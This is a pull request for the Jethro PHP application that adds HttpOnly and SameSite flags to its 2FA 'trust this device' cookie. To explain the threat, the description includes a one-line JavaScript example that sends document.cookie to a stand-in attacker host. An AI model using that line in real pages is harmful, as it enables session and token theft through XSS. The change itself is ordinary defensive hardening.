### PR TITLE
Harden 2FA trust cookie with HttpOnly and SameSite flags

### DIFF
--- a/include/user_system.class.php
+++ b/include/user_system.class.php
@@ -465,7 +465,11 @@ class User_System extends Abstract_User_System
 			if (!$res) $this->_2faLog("ERROR: Failed saving trust record to DB");
 
 			$expiry = strtotime('+'.$trust_days.' days');
-			$res = setcookie('Jethro2FATrust', $trust_token, $expiry);
+				$res = setcookie('Jethro2FATrust', $trust_token, [
+					'expires'  => $expiry,
+					'httponly' => true,
+					'samesite' => 'Lax',
+				]);
 			if (!$res) trigger_error("Could not save trust cookie");
 
 


### PR DESCRIPTION
Jethro's 2FA entry box has a 'Trust this device for N days' checkbox, which sets the Jethro2FATrust cookie. 

This change adds two flags to the cookie:
- httponly: true  = cookie inaccessible to JavaScript
- samesite: Lax   = cookie not sent on cross-site POST requests

Without these flags an attacker who can inject JS into any page of the app (e.g. via a stored-XSS) can steal the trust
token with 'document.cookie', e.g.:
```js
new Image().src = 'https://evil.collect/?c=' + encodeURIComponent(document.cookie);
```
Stealing the Jethro2FATrust cookie isn't particularly useful to an attacker on its own, but could be used along with a
leaked password to gain access.
